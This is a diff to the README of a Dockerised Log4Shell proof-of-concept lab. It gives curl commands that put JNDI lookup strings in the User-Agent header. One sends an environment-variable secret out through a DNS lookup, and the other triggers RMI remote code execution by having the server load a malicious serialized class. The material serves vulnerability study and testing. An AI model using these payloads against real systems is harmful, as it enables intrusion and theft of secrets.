cyberxml/log4j-poc/README.md

 1. In a second terminal, run the following.
 The IP is the ip address of the docker host
     1. `curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/`
 1. The vulnerable web server will attempt to do a TXT lookup at the given IP.
 See log4j-dns_exfil.pcap

+### Run an RMI RCE Demo on Recent Java 11 version

+I am having issues with command line arg for ping target.
+So you have to compile yourself.

+#### Compile
+1. Start the docker containers in a terminal
+    1. `docker-compose up`
+1. In another terminal, Login to the cve-poc
+    1. `docker exec -it log4j-poc_cve-poc_1 /bin/bash`
+1. Kill running RMIServerPOC instance
+1. Change to rmi-poc directory
+    1. `cd /home/user/rmi-poc`
+1. Edit RMIServerPOC.java to change 10.10.10.31 to your ping target
+1. Recompile
+    1. `javac -cp catalina.jar:.
+RMIServerPOC.java`
+1. Run the Server
+    1. `javac -cp catalina.jar:.
+RMIServerPOC 127.0.0.1`

+#### Run RMI RCE Demo

+1. Start the docker containers in a terminal
+    1. `docker-compose up`
+1. In a second terminal, run the following.
+The IP is the ip address of the docker host
+    1. `curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/`
+1. The vulnerable web server will download a serialized malicious class from the RMI server for a class which already exists in the Tomcat environment.
+1. This will ping the IP address defined in the compile section.

 ### Detect UA Vulnerability
 1. cd scripts